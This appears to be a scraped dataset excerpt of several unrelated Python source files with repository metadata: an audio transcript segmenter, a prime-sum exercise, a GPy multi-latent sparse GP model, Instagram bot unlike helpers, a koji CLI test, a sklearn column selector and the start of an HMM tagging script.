\"Problem with interval %s: interval duration collapses to 0 seconds.\"\n msg += \"Calculation used 'corrected interval' %s.\"\n msg += \"Removing interval...\"\n msg %= (\n self._interval_to_str(start, end, value),\n self._interval_to_str(new_start, new_end, value),\n )\n logger.error(msg)\n continue\n\n # Add the interval to the new entry list.\n new_entries.append((new_start, new_end, value))\n\n # Remember last interval.\n last_start, last_end, last_value = start, end, value\n\n return new_entries\n\n def _calculate_segment_end(\n self,\n segment_start: float,\n audio_duration: float,\n ):\n nominal_end = segment_start + self.SEGMENT_DURATION_SEC\n nearest_end = self._get_nearest_bound(nominal_end, \"end\")\n offset = abs(nearest_end - nominal_end)\n max_offset = self.SEGMENT_DURATION_SEC * self.MIN_SEGMENT_LENGTH_FACTOR\n if offset > max_offset:\n segment_end = nominal_end\n else:\n segment_end = nearest_end\n\n # Make sure final segment is long enough.\n rest = audio_duration - segment_end\n if rest < max_offset:\n segment_end = audio_duration\n\n return segment_end\n\n def _get_nearest_bound(self, time: float, bound: str):\n # bound must be either \"start\" or \"end\"\n if bound not in {\"start\", \"end\"}:\n raise Exception(\"bound must be 'start' or 'end'.\")\n\n ctm_lines: List[CtmLine] = self.data[\"ctm_lines\"]\n min_dist = None\n best_line = None\n for line in 
ctm_lines:\n\n # Calculate error. Positive error means the line is after the desired\n # time.\n if bound == \"start\":\n err = line.start - time\n if bound == \"end\":\n err = line.end - time\n\n cur_dist = abs(err)\n # Assuming lines are chronologically ordered, define exit clause.\n if min_dist is not None and err > 0 and cur_dist > min_dist:\n break\n # Save minimum distance?\n if min_dist is None or cur_dist < min_dist:\n min_dist = cur_dist\n best_line = line\n\n # Return best value.\n if best_line is None:\n return None\n elif bound == \"start\":\n return best_line.start\n elif bound == \"end\":\n return best_line.end\n\n def _filter_lines(\n self, lines: List[CtmLine], start_time: float = None, end_time: float = None\n ):\n eps = 1e-3\n filtered = False\n # Filter words occurring after `start_time`.\n if start_time is not None:\n lines = filter(lambda x: x.start > start_time - eps, lines)\n filtered = True\n # Filter words occurring before `end_time`.\n if end_time is not None:\n lines = filter(lambda x: x.end < end_time + eps, lines)\n filtered = True\n\n if filtered:\n return list(lines)\n else:\n return lines\n\n def _lines_to_utterance(\n self, lines: List[CtmLine], start_time: float = None, end_time: float = None\n ):\n # Works best if start_time/end_time are at a word boundary!\n\n # Filter lines based on desired start/end times.\n lines = self._filter_lines(lines, start_time, end_time)\n\n # Filter out silences.\n lines = filter(lambda x: x.word != \"\", lines)\n\n # Return utterance.\n return \" \".join(x.word for x in lines)\n\n async def write_textgrids_async(\n self,\n textgrids_dir: str,\n audio_segments_dir: str,\n context_secs: float = 0,\n sleep_secs: float = 0.1,\n ):\n # Create output directories.\n if not os.path.exists(textgrids_dir):\n os.makedirs(textgrids_dir)\n if not os.path.exists(audio_segments_dir):\n os.makedirs(audio_segments_dir)\n\n audio_path: str = self.data[\"audio_path\"]\n ctm_lines: List[CtmLine] = self.data[\"ctm_lines\"]\n\n # Calculate audio duration and number of segments.\n audio_duration = audio.getDuration(audio_path)\n\n # Load audio file.\n fs, audio_data = wavfile.read(audio_path)\n\n # Process per segment.\n segment_idx = 0\n segment_start = 0\n segment_end = self._calculate_segment_end(\n segment_start,\n audio_duration,\n )\n eps = 1e-3\n while segment_start + eps < audio_duration:\n\n # Give other threads a chance to run.\n await asyncio.sleep(sleep_secs)\n\n # Calculate start/end context duration. This will add X seconds to\n # start/end of audio in order to provide a bit of context. 
Of course,\n # this is not possible at the start/end of the file.\n start_context = min(segment_start, context_secs)\n end_context = min(audio_duration - segment_end, context_secs)\n\n # Calculate lines.\n filtered_lines = self._filter_lines(\n ctm_lines,\n start_time=segment_start,\n end_time=segment_end,\n )\n\n # Calculate utterance.\n segment_utterance = self._lines_to_utterance(filtered_lines)\n\n # ==================== #\n # CREATE AUDIO SEGMENT #\n # ==================== #\n\n # Make sure we include the context audio!\n audio_start = max(int((segment_start - start_context) * fs), 0)\n audio_end = min(int((segment_end + end_context) * fs), len(audio_data))\n audio_segment_data = audio_data[audio_start:audio_end]\n audio_segment_path = os.path.join(\n audio_segments_dir,\n \"%s_%03i.wav\" % (self.base_name, segment_idx),\n )\n wavfile.write(audio_segment_path, fs, audio_segment_data)\n\n # =============== #\n # CREATE TEXTGRID #\n # =============== #\n tg = textgrid.Textgrid()\n\n minT = 0\n maxT = segment_end - segment_start + start_context + end_context\n\n # Construct entries for each tier.\n utt_entries = [\n (minT + start_context, maxT - end_context, segment_utterance)\n ]\n word_entries = [\n x.word_entry(offset=-segment_start + start_context)\n for x in filtered_lines\n ]\n score_entries = [\n x.score_entry(offset=-segment_start + start_context)\n for x in filtered_lines\n ]\n\n # Add an entry for each context area in the 3 tiers.\n if start_context > 0:\n entry_times = (minT, start_context)\n # Utt tier.\n entry = (*entry_times, \"Start context: do not annotate this part!\")\n utt_entries.insert(0, entry)\n # Word tier.\n entry = (*entry_times, \"/CONTEXT/\")\n word_entries.insert(0, entry)\n # Score tier.\n entry = (*entry_times, \"/\")\n score_entries.insert(0, entry)\n if end_context > 0:\n entry_times = (maxT - end_context, maxT)\n # Utt tier.\n entry = (*entry_times, \"End context: do not annotate this part!\")\n utt_entries.append(entry)\n # Word tier.\n entry = (*entry_times, \"/CONTEXT/\")\n word_entries.append(entry)\n # Score tier.\n entry = (*entry_times, \"/\")\n score_entries.append(entry)\n\n # Fix any rounding errors.\n utt_entries = self._fix_rounding_errors(utt_entries, minT, maxT)\n word_entries = self._fix_rounding_errors(word_entries, minT, maxT)\n score_entries = self._fix_rounding_errors(score_entries, minT, maxT)\n\n # Create the Tiers.\n utt_tier = textgrid.IntervalTier(\n name=\"utterance\",\n entryList=utt_entries,\n minT=minT,\n maxT=maxT,\n )\n word_tier = textgrid.IntervalTier(\n name=\"words\",\n entryList=word_entries,\n minT=minT,\n maxT=maxT,\n )\n score_tier = textgrid.IntervalTier(\n name=\"scores\",\n entryList=score_entries,\n minT=minT,\n maxT=maxT,\n )\n\n # Add the tiers.\n tg.addTier(utt_tier)\n tg.addTier(word_tier)\n tg.addTier(score_tier)\n\n # Write the file.\n textgrid_segment_path = os.path.join(\n textgrids_dir,\n \"%s_%03i.TextGrid\" % (self.base_name, segment_idx),\n )\n tg.save(\n textgrid_segment_path,\n format=\"short_textgrid\",\n includeBlankSpaces=False,\n )\n\n # Next segment.\n segment_idx += 1\n segment_start = segment_end\n segment_end = self._calculate_segment_end(\n segment_start,\n audio_duration,\n )\n","repo_name":"btamm12/fpack_webapp_client","sub_path":"src/utils/ctm_converter.py","file_name":"ctm_converter.py","file_ext":"py","file_size_in_byte":16690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16783524713","text":"M = int(input())\nN = 
int(input())\n\nprime = [True]*(N+1)\nprime[0] = False\nprime[1] = False\n\nfor i in range(2, int(N**(1/2))+1):\n for j in range(2, int(N/2)+1):\n if i*j > N:\n break\n\n prime[i*j] = False\n\ntotal = 0\nfor i in range(M, N+1):\n if prime[i]:\n if total == 0:\n min_prime = i\n total = total + i\n\nif total == 0:\n print(-1)\n\nelse:\n print(total)\n print(min_prime)\n","repo_name":"yyytae0/algorithm-training","sub_path":"baekjoon/2581.py","file_name":"2581.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3751884213","text":"import numpy as np\nfrom GPy.util import choleskies\nfrom GPy.core.model import Model\nfrom GPy.core.parameterization.param import Param\nfrom svgp_multi_inf import SVGPMultiInf as svgp_inf\nfrom GPy.util.linalg import mdot\nfrom GPy.core.parameterization.variational import VariationalPosterior, NormalPosterior\nfrom GPy.core.parameterization import ObsAr\nimport GPy\nimport sys\nfrom GPy.plotting.matplot_dep.util import fixed_inputs\nimport matplotlib.pyplot as plt\n\nclass SVGPMulti(GPy.core.SparseGP):\n def __init__(self, X, Y, Z, kern_list, likelihood, mean_functions=None, name='SVGPMulti', Y_metadata=None, batchsize=None):\n \"\"\"\n Extension to the SVGP to allow multiple latent function,\n where the latent functions are assumed independant (have one kernel per latent function)\n \"\"\"\n # super(SVGPMulti, self).__init__(name) # Parameterized.__init__(self)\n\n assert X.ndim == 2\n self.Y_metadata = Y_metadata\n _, self.output_dim = Y.shape\n\n # self.Z = Param('inducing inputs', Z)\n # self.num_inducing = Z.shape[0]\n # self.likelihood = likelihood\n\n self.kern_list = kern_list\n self.batchsize = batchsize\n\n #Batch the data\n self.X_all, self.Y_all = X, Y\n if batchsize is None:\n X_batch, Y_batch = X, Y\n else:\n import climin.util\n #Make a climin slicer to make drawing minibatches much quicker\n self.slicer = climin.util.draw_mini_slices(self.X_all.shape[0], self.batchsize)\n X_batch, Y_batch = self.new_batch()\n\n # if isinstance(X_batch, (ObsAr, VariationalPosterior)):\n # self.X = X_batch.copy()\n # else:\n # self.X = ObsAr(X_batch)\n # self.Y = Y_batch\n\n #create the SVI inference method\n # self.inference_method = svgp_inf()\n inference_method = svgp_inf()\n\n #Initialize base model\n super(SVGPMulti, self).__init__(X=X_batch, Y=Y_batch, Z=Z, kernel=kern_list[0], likelihood=likelihood, mean_function=None, X_variance=None, inference_method=inference_method, name=name, Y_metadata=Y_metadata, normalizer=False)\n self.unlink_parameter(self.kern) # We don't want a single kern\n\n # self.num_data, self.input_dim = self.X.shape\n self.num_outputs = self.Y.shape[1]\n\n self.num_latent_funcs = self.likelihood.request_num_latent_functions(self.Y_all)\n\n #Make a latent function per dimension\n self.q_u_means = Param('q_u_means', np.zeros((self.num_inducing, self.num_latent_funcs)))\n chols = choleskies.triang_to_flat(np.tile(np.eye(self.num_inducing)[None,:,:], (self.num_latent_funcs,1,1)))\n self.q_u_chols = Param('qf_u_chols', chols)\n\n self.link_parameter(self.Z, index=0)\n self.link_parameter(self.q_u_means)\n self.link_parameter(self.q_u_chols)\n # self.link_parameter(self.likelihood)\n\n #Must pass a list of kernels that work on each latent function for now\n assert len(kern_list) == self.num_latent_funcs\n #Add the rest of the kernels, one kernel per latent function\n [self.link_parameter(kern) for kern in kern_list]\n #self.latent_f_list = 
[self.mf, self.mg]\n #self.latent_fchol_list = [self.cholf, self.cholg]\n\n if mean_functions is None:\n self.mean_functions = [None]*self.num_latent_funcs\n elif len(mean_functions) != len(kern_list):\n raise ValueError(\"Must provide a mean function for all latent\\n\\\n functions as a list, provide None if no latent\\n\\\n function is needed for a specific latent function\")\n else:\n self.mean_functions = []\n for m_f in mean_functions:\n if m_f is not None:\n self.link_parameter(m_f)\n self.mean_functions.append(m_f)\n\n\n def log_likelihood(self):\n return self._log_marginal_likelihood\n\n def parameters_changed(self):\n self.batch_scale = float(self.X_all.shape[0])/float(self.X.shape[0])\n self.posteriors, self._log_marginal_likelihood, grad_dict = self.inference_method.inference(self.q_u_means, self.q_u_chols, self.kern_list, self.X, self.Z, self.likelihood,\n self.Y, self.mean_functions, self.Y_metadata, KL_scale=1.0, batch_scale=self.batch_scale)\n self.likelihood.update_gradients(grad_dict['dL_dthetaL'])\n #update the kernel gradients\n #Shared Z\n Z_grad = np.zeros_like(self.Z.values)\n for latent_f_ind, kern in enumerate(self.kern_list):\n kern.update_gradients_full(grad_dict['dL_dKmm'][latent_f_ind], self.Z)\n grad = kern.gradient.copy()\n kern.update_gradients_full(grad_dict['dL_dKmn'][latent_f_ind], self.Z, self.X)\n grad += kern.gradient.copy()\n kern.update_gradients_diag(grad_dict['dL_dKdiag'][latent_f_ind], self.X)\n kern.gradient += grad\n if not self.Z.is_fixed:# only compute these expensive gradients if we need them\n Z_grad += kern.gradients_X(grad_dict['dL_dKmm'][latent_f_ind], self.Z)\n Z_grad += kern.gradients_X(grad_dict['dL_dKmn'][latent_f_ind], self.Z, self.X)\n\n #update the variational parameter gradients:\n self.q_u_means[:, latent_f_ind*self.num_outputs:(latent_f_ind+1)*self.num_outputs].gradient = grad_dict['dL_dm'][latent_f_ind]\n self.q_u_chols[:, latent_f_ind*self.num_outputs:(latent_f_ind+1)*self.num_outputs].gradient = grad_dict['dL_dchol'][latent_f_ind]\n\n mean_function = self.mean_functions[latent_f_ind]\n if mean_function is not None:\n mean_function.update_gradients(grad_dict['dL_dmfX'][latent_f_ind], self.X)\n g = mean_function.gradient[:].copy()\n mean_function.update_gradients(grad_dict['dL_dmfZ'][latent_f_ind], self.Z)\n mean_function.gradient[:] += g\n Z_grad += mean_function.gradients_X(grad_dict['dL_dmfZ'][latent_f_ind], self.Z)\n\n if not self.Z.is_fixed:# only compute these expensive gradients if we need them\n self.Z.gradient[:] = Z_grad\n\n def set_data(self, X, Y):\n \"\"\"\n Set the data without calling parameters_changed to avoid wasted computation\n If this is called by the stochastic_grad function this will immediately update the gradients\n \"\"\"\n assert X.shape[1]==self.Z.shape[1]\n self.X, self.Y = X, Y\n\n def new_batch(self):\n \"\"\"\n Return a new batch of X and Y by taking a chunk of data from the complete X and Y\n \"\"\"\n i = self.slicer.next()\n return self.X_all[i], self.Y_all[i]\n\n def stochastic_grad(self, parameters):\n self.set_data(*self.new_batch())\n return self._grads(parameters)\n\n def optimizeWithFreezingZ(self):\n self.Z.fix()\n self.kern.fix()\n self.optimize('bfgs')\n self.Z.unfix()\n self.kern.constrain_positive()\n self.optimize('bfgs')\n\n def log_predictive_density(self, x_test, y_test, Y_metadata=None):\n mf, vf = self._raw_predict(x_test, 0)\n mg, vg = self._raw_predict(x_test, 1)\n mu_stars = [mf, mg]\n var_stars = [vf, vg]\n return self.likelihood.log_predictive_density(y_test, mu_stars, 
var_stars, Y_metadata)\n\n def log_predictive_density_sampling(self, x_test, y_test, Y_metadata=None, num_samples=1000):\n mf, vf = self._raw_predict(x_test, 0)\n mg, vg = self._raw_predict(x_test, 1)\n mu_stars = np.hstack((mf, mg))\n var_stars = np.hstack((vf, vg))\n return self.likelihood.log_predictive_density_sampling(y_test, mu_stars, var_stars, Y_metadata, num_samples=num_samples)\n\n def _raw_predict(self, Xnew, latent_function_ind=None, full_cov=False, kern=None):\n \"\"\"\n Make a prediction for the latent function values.\n\n For certain inputs we give back a full_cov of shape NxN,\n if there is missing data, each dimension has its own full_cov of shape NxNxD, and if full_cov is of,\n we take only the diagonal elements across N.\n\n For uncertain inputs, the SparseGP bound produces a full covariance structure across D, so for full_cov we\n return a NxDxD matrix and in the not full_cov case, we return the diagonal elements across D (NxD).\n This is for both with and without missing data. See for missing data SparseGP implementation py:class:'~GPy.models.sparse_gp_minibatch.SparseGPMiniBatch'.\n \"\"\"\n #Plot f by default\n if latent_function_ind is None:\n latent_function_ind = 0\n\n if kern is None:\n kern = self.kern_list[latent_function_ind]\n\n posterior = self.posteriors[latent_function_ind]\n\n Kx = kern.K(self.Z, Xnew)\n mu = np.dot(Kx.T, posterior.woodbury_vector)\n if full_cov:\n Kxx = kern.K(Xnew)\n if posterior.woodbury_inv.ndim == 2:\n var = Kxx - np.dot(Kx.T, np.dot(posterior.woodbury_inv, Kx))\n elif posterior.woodbury_inv.ndim == 3:\n var = Kxx[:,:,None] - np.tensordot(np.dot(np.atleast_3d(posterior.woodbury_inv).T, Kx).T, Kx, [1,0]).swapaxes(1,2)\n var = var\n else:\n Kxx = kern.Kdiag(Xnew)\n var = (Kxx - np.sum(np.dot(np.atleast_3d(posterior.woodbury_inv).T, Kx) * Kx[None,:,:], 1)).T\n #add in the mean function\n if self.mean_functions[latent_function_ind] is not None:\n mu += self.mean_functions[latent_function_ind].f(Xnew)\n\n return mu, var\n\n def plot_fs(self, dim=0, variances=False, median=True, true_variance=True):\n \"\"\"\n Plotting for models with two latent functions, one is an exponent over the scale\n parameter\n \"\"\"\n assert self.likelihood.request_num_latent_functions(self.Y) == 2\n if median:\n XX = fixed_inputs(self, non_fixed_inputs=[dim], fix_routine='median', as_list=False)\n else:\n XX = np.linspace(self.X[:, dim].min(), self.X[:, dim].max(), 200)[:, None]\n X_pred_points = XX.copy()\n X_pred_points_lin = np.linspace(self.X[:, dim].min(), self.X[:, dim].max(), self.X.shape[0])\n X_pred_points[:, dim] = X_pred_points_lin\n\n mf, vf = self._raw_predict(X_pred_points, 0)\n mg, vg = self._raw_predict(X_pred_points, 1)\n\n f_std = np.sqrt(vf)\n mf_lower = mf - 2*f_std\n mf_upper = mf + 2*f_std\n\n if true_variance:\n #Real likelihood variance\n g_std = np.sqrt(self.likelihood.conditional_variance(mg))\n g_std_err_f = 2*np.sqrt(np.exp(vg)) # Standard error in f space\n vg_std = np.sqrt(self.likelihood.conditional_variance(g_std_err_f)) # std error in likelihood space\n else:\n #Squared scale parameter\n g_std = np.sqrt(np.exp(mg))\n vg_std = np.sqrt(vg)\n\n mg_loc_upper = mf + 2*g_std\n mg_loc_lower = mf - 2*g_std\n\n fig, ax = plt.subplots()\n X_dim = X_pred_points[:,dim:dim+1]\n ax.plot(X_dim, mf, 'b-')\n ax.plot(X_dim, mg_loc_upper, 'g-')\n ax.plot(X_dim, mg_loc_lower, 'm-')\n ax.plot(XX, self.Y, 'kx')\n\n if variances:\n ax.plot(X_dim, mf_upper, 'b--', alpha=0.5)\n ax.plot(X_dim, mf_lower, 'b--', alpha=0.5)\n\n gf_upper_upper = mg_loc_upper 
+ 2*vg_std\n gf_upper_lower = mg_loc_upper - 2*vg_std\n\n gf_lower_upper = mg_loc_lower + 2*vg_std\n gf_lower_lower = mg_loc_lower - 2*vg_std\n\n #Variance around upper standard erro\n ax.plot(X_dim, gf_upper_upper, 'g--', alpha=0.5)\n ax.plot(X_dim, gf_upper_lower, 'g--', alpha=0.5)\n\n #Variance around lower standard error\n ax.plot(X_dim, gf_lower_upper, 'm--', alpha=0.5)\n ax.plot(X_dim, gf_lower_lower, 'm--', alpha=0.5)\n\n # def plot_f(self, plot_limits=None, which_data_rows='all',\n # which_data_ycols='all', fixed_inputs=[],\n # levels=20, samples=0, fignum=None, ax=None, resolution=None,\n # plot_raw=True,\n # linecol=None,fillcol=None, Y_metadata=None, data_symbol='kx',\n # apply_link=False):\n # \"\"\"\n # Plot the GP's view of the world, where the data is normalized and before applying a likelihood.\n # This is a call to plot with plot_raw=True.\n # Data will not be plotted in this, as the GP's view of the world\n # may live in another space, or units then the data.\n\n # Can plot only part of the data and part of the posterior functions\n # using which_data_rowsm which_data_ycols.\n\n # :param plot_limits: The limits of the plot. If 1D [xmin,xmax], if 2D [[xmin,ymin],[xmax,ymax]]. Defaluts to data limits\n # :type plot_limits: np.array\n # :param which_data_rows: which of the training data to plot (default all)\n # :type which_data_rows: 'all' or a slice object to slice model.X, model.Y\n # :param which_data_ycols: when the data has several columns (independant outputs), only plot these\n # :type which_data_ycols: 'all' or a list of integers\n # :param fixed_inputs: a list of tuple [(i,v), (i,v)...], specifying that input index i should be set to value v.\n # :type fixed_inputs: a list of tuples\n # :param resolution: the number of intervals to sample the GP on. 
Defaults to 200 in 1D and 50 (a 50x50 grid) in 2D\n # :type resolution: int\n # :param levels: number of levels to plot in a contour plot.\n # :param levels: for 2D plotting, the number of contour levels to use is ax is None, create a new figure\n # :type levels: int\n # :param samples: the number of a posteriori samples to plot\n # :type samples: int\n # :param fignum: figure to plot on.\n # :type fignum: figure number\n # :param ax: axes to plot on.\n # :type ax: axes handle\n # :param linecol: color of line to plot [Tango.colorsHex['darkBlue']]\n # :type linecol: color either as Tango.colorsHex object or character ('r' is red, 'g' is green) as is standard in matplotlib\n # :param fillcol: color of fill [Tango.colorsHex['lightBlue']]\n # :type fillcol: color either as Tango.colorsHex object or character ('r' is red, 'g' is green) as is standard in matplotlib\n # :param Y_metadata: additional data associated with Y which may be needed\n # :type Y_metadata: dict\n # :param data_symbol: symbol as used matplotlib, by default this is a black cross ('kx')\n # :type data_symbol: color either as Tango.colorsHex object or character ('r' is red, 'g' is green) alongside marker type, as is standard in matplotlib.\n # :param apply_link: if there is a link function of the likelihood, plot the link(f*) rather than f*\n # :type apply_link: boolean\n # \"\"\"\n # assert \"matplotlib\" in sys.modules, \"matplotlib package has not been imported.\"\n # from GPy.plotting.matplot_dep import models_plots\n # kw = {}\n # if linecol is not None:\n # kw['linecol'] = linecol\n # if fillcol is not None:\n # kw['fillcol'] = fillcol\n # return models_plots.plot_fit(self, plot_limits, which_data_rows,\n # which_data_ycols, fixed_inputs,\n # levels, samples, fignum, ax, resolution,\n # plot_raw=plot_raw, Y_metadata=Y_metadata,\n # data_symbol=data_symbol, apply_link=apply_link, **kw)\n\n # def plot(self, plot_limits=None, which_data_rows='all',\n # which_data_ycols='all', fixed_inputs=[],\n # levels=20, samples=0, fignum=None, ax=None, resolution=None,\n # plot_raw=False,\n # linecol=None,fillcol=None, Y_metadata=None, data_symbol='kx'):\n # \"\"\"\n # Plot the posterior of the GP.\n # - In one dimension, the function is plotted with a shaded region identifying two standard deviations.\n # - In two dimsensions, a contour-plot shows the mean predicted function\n # - In higher dimensions, use fixed_inputs to plot the GP with some of the inputs fixed.\n\n # Can plot only part of the data and part of the posterior functions\n # using which_data_rowsm which_data_ycols.\n\n # :param plot_limits: The limits of the plot. If 1D [xmin,xmax], if 2D [[xmin,ymin],[xmax,ymax]]. Defaluts to data limits\n # :type plot_limits: np.array\n # :param which_data_rows: which of the training data to plot (default all)\n # :type which_data_rows: 'all' or a slice object to slice model.X, model.Y\n # :param which_data_ycols: when the data has several columns (independant outputs), only plot these\n # :type which_data_ycols: 'all' or a list of integers\n # :param fixed_inputs: a list of tuple [(i,v), (i,v)...], specifying that input index i should be set to value v.\n # :type fixed_inputs: a list of tuples\n # :param resolution: the number of intervals to sample the GP on. 
Defaults to 200 in 1D and 50 (a 50x50 grid) in 2D\n # :type resolution: int\n # :param levels: number of levels to plot in a contour plot.\n # :param levels: for 2D plotting, the number of contour levels to use is ax is None, create a new figure\n # :type levels: int\n # :param samples: the number of a posteriori samples to plot\n # :type samples: int\n # :param fignum: figure to plot on.\n # :type fignum: figure number\n # :param ax: axes to plot on.\n # :type ax: axes handle\n # :param linecol: color of line to plot [Tango.colorsHex['darkBlue']]\n # :type linecol: color either as Tango.colorsHex object or character ('r' is red, 'g' is green) as is standard in matplotlib\n # :param fillcol: color of fill [Tango.colorsHex['lightBlue']]\n # :type fillcol: color either as Tango.colorsHex object or character ('r' is red, 'g' is green) as is standard in matplotlib\n # :param Y_metadata: additional data associated with Y which may be needed\n # :type Y_metadata: dict\n # :param data_symbol: symbol as used matplotlib, by default this is a black cross ('kx')\n # :type data_symbol: color either as Tango.colorsHex object or character ('r' is red, 'g' is green) alongside marker type, as is standard in matplotlib.\n # \"\"\"\n # assert \"matplotlib\" in sys.modules, \"matplotlib package has not been imported.\"\n # from GPy.plotting.matplot_dep import models_plots\n # kw = {}\n # if linecol is not None:\n # kw['linecol'] = linecol\n # if fillcol is not None:\n # kw['fillcol'] = fillcol\n # return models_plots.plot_fit(self, plot_limits, which_data_rows,\n # which_data_ycols, fixed_inputs,\n # levels, samples, fignum, ax, resolution,\n # plot_raw=plot_raw, Y_metadata=Y_metadata,\n # data_symbol=data_symbol, **kw)\n","repo_name":"SheffieldML/ChainedGP","sub_path":"chained_gp/svgp_multi.py","file_name":"svgp_multi.py","file_ext":"py","file_size_in_byte":19273,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"16760205043","text":"from tqdm import tqdm\n\nfrom . import limits\nfrom . 
import delay\n\n\ndef unlike(self, media_id):\n if limits.check_if_bot_can_unlike(self):\n delay.unlike_delay(self)\n if super(self.__class__, self).unlike(media_id):\n self.total_unliked += 1\n return True\n else:\n self.logger.info(\"Out of unlikes for today.\")\n return False\n\n\ndef unlike_medias(self, medias):\n broken_items = []\n self.logger.info(\"Going to unlike %d medias.\" % (len(medias)))\n for media in tqdm(medias):\n if not self.unlike(media):\n delay.error_delay(self)\n broken_items = medias[medias.index(media):]\n break\n self.logger.info(\"DONE: Total unliked %d medias.\" % self.total_unliked)\n return broken_items\n\n\ndef unlike_user(self, user_id):\n self.logger.info(\"Going to unlike user %s's feed:\" % user_id)\n user_id = self.convert_to_user_id(user_id)\n medias = self.get_user_medias(user_id, filtration=False)\n return self.unlike_medias(medias)\n","repo_name":"4rshdeep/inspirata","sub_path":"instabot/instabot/bot/bot_unlike.py","file_name":"bot_unlike.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"11996419610","text":"from sklearn.base import BaseEstimator\nfrom sklearn.base import TransformerMixin\n\n\nclass ColumnSelector(TransformerMixin, BaseEstimator):\n def __init__(self, index=slice(None)):\n self.index = index\n self.n_features = None\n\n def fit(self, x, y=None):\n if len(x.shape) == 2:\n _, self.n_features = x.shape\n else:\n self.n_features = x.shape[0]\n return self\n\n def transform(self, x, y=None):\n xnew = x[..., self.index]\n if len(xnew.shape) == 2:\n return xnew\n else:\n return xnew.reshape(-1, 1)\n\n def get_feature_names(self, input_features=None):\n input_features = input_features or [\"x_{}\".format(i) for i in range(self.n_features)]\n if self.index == slice(None):\n return input_features\n else:\n return [n for i, n in zip(self.index, input_features) if i]\n","repo_name":"Ohjeah/sparsereg","sub_path":"sparsereg/util/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"54"} +{"seq_id":"21334418297","text":"from __future__ import absolute_import\n\nimport mock\nfrom six.moves import StringIO\n\nimport koji\nfrom koji_cli.commands import anon_handle_list_tag_inheritance\nfrom . 
import utils\n\n\nclass TestListTagInheritance(utils.CliTestCase):\n def setUp(self):\n self.options = mock.MagicMock()\n self.options.debug = False\n self.session = mock.MagicMock()\n self.session.getAPIVersion.return_value = koji.API_VERSION\n self.tag = 'test-tag'\n\n @mock.patch('sys.stderr', new_callable=StringIO)\n def test_without_option(self, stderr):\n expected = \"Usage: %s list-tag-inheritance [options] <tag>\\n\\n\" \\\n \"Prints tag inheritance with basic information about links.\\n\" \\\n \"Four flags could be seen in the output:\\n\" \\\n \" M - maxdepth - limits inheritance to n-levels\\n\" \\\n \" F - package filter (packages ignored for inheritance)\\n\" \\\n \" I - intransitive link - inheritance immediately stops here\\n\" \\\n \" N - noconfig - if tag is used in buildroot, its configuration values \" \\\n \"will not be used\\n\\n\" \\\n \"Exact values for maxdepth and package filter can be inquired by \" \\\n \"taginfo command.\\n\\n\" \\\n \"(Specify the --help global option for a list of other help options)\\n\\n\" \\\n \"%s: error: This command takes exactly one argument: \" \\\n \"a tag name or ID\\n\" % (self.progname, self.progname)\n with self.assertRaises(SystemExit) as ex:\n anon_handle_list_tag_inheritance(self.options, self.session, [])\n self.assertExitCode(ex, 2)\n self.assert_console_message(stderr, expected)\n\n @mock.patch('sys.stderr', new_callable=StringIO)\n def test_with_non_exist_tag(self, stderr):\n expected = \"Usage: %s list-tag-inheritance [options] <tag>\\n\\n\" \\\n \"Prints tag inheritance with basic information about links.\\n\" \\\n \"Four flags could be seen in the output:\\n\" \\\n \" M - maxdepth - limits inheritance to n-levels\\n\" \\\n \" F - package filter (packages ignored for inheritance)\\n\" \\\n \" I - intransitive link - inheritance immediately stops here\\n\" \\\n \" N - noconfig - if tag is used in buildroot, its configuration values \" \\\n \"will not be used\\n\\n\" \\\n \"Exact values for maxdepth and package filter can be inquired by \" \\\n \"taginfo command.\\n\\n\" \\\n \"(Specify the --help global option for a list of other help options)\\n\\n\" \\\n \"%s: error: No such tag: %s\\n\" % (self.progname, self.progname, self.tag)\n self.session.getTag.return_value = None\n with self.assertRaises(SystemExit) as ex:\n anon_handle_list_tag_inheritance(self.options, self.session, [self.tag])\n self.assertExitCode(ex, 2)\n self.assert_console_message(stderr, expected)\n\n def test_help(self):\n self.assert_help(\n anon_handle_list_tag_inheritance,\n \"\"\"Usage: %s list-tag-inheritance [options] <tag>\n\nPrints tag inheritance with basic information about links.\nFour flags could be seen in the output:\n M - maxdepth - limits inheritance to n-levels\n F - package filter (packages ignored for inheritance)\n I - intransitive link - inheritance immediately stops here\n N - noconfig - if tag is used in buildroot, its configuration values will not be used\n\nExact values for maxdepth and package filter can be inquired by taginfo command.\n\n(Specify the --help global option for a list of other help options)\n\nOptions:\n -h, --help show this help message and exit\n --reverse Process tag's children instead of its parents\n --event=EVENT# query at event\n --ts=TIMESTAMP query at last event before timestamp\n --repo=REPO# query at event for a repo\n\"\"\" % 
self.progname)\n","repo_name":"yifengyou/koji","sub_path":"BUILD/koji-1.30.0-tests/test_cli/test_list_tag_inheritance.py","file_name":"test_list_tag_inheritance.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"22692967763","text":"import numpy as np\nimport pandas as pd\nimport nltk\nimport hmmlearn.hmm as hmm\nfrom time import time\nfrom tqdm import tqdm\nfrom hmmModel import getDataFrame, getPOSMapping, getWordObs, MyHMM\n\nif __name__ == \"__main__\":\n # Load in the Data\n train_corpus = nltk.corpus.brown.tagged_sents(tagset='universal')[:16000]\n val_corpus = nltk.corpus.brown.tagged_sents(tagset='universal')[16000:18000]\n test_corpus = nltk.corpus.brown.tagged_sents(tagset='universal')[18000:20000]\n\n # Convert the Data to a DataFrame\n df_train = getDataFrame(train_corpus)\n df_val = getDataFrame(val_corpus)\n df_test = getDataFrame(test_corpus)\n\n # Set some variables\n np.random.seed(42)\n n_states = 12\n sentNum = 0\n\n # Concatenate sentences together\n trainingObservations = df_train.Word.iloc[0]\n for i, sentList in enumerate(df_train.Word):\n if i == 0:\n continue\n trainingObservations.extend(sentList)\n\n # Train the HMM Model on one sentence\n train_POSMap = getPOSMapping()\n sentObs = getWordObs(trainingObservations)\n\n # Take 20 Samples from the model\n start_time = time()\n myHmm = MyHMM(train_corpus, 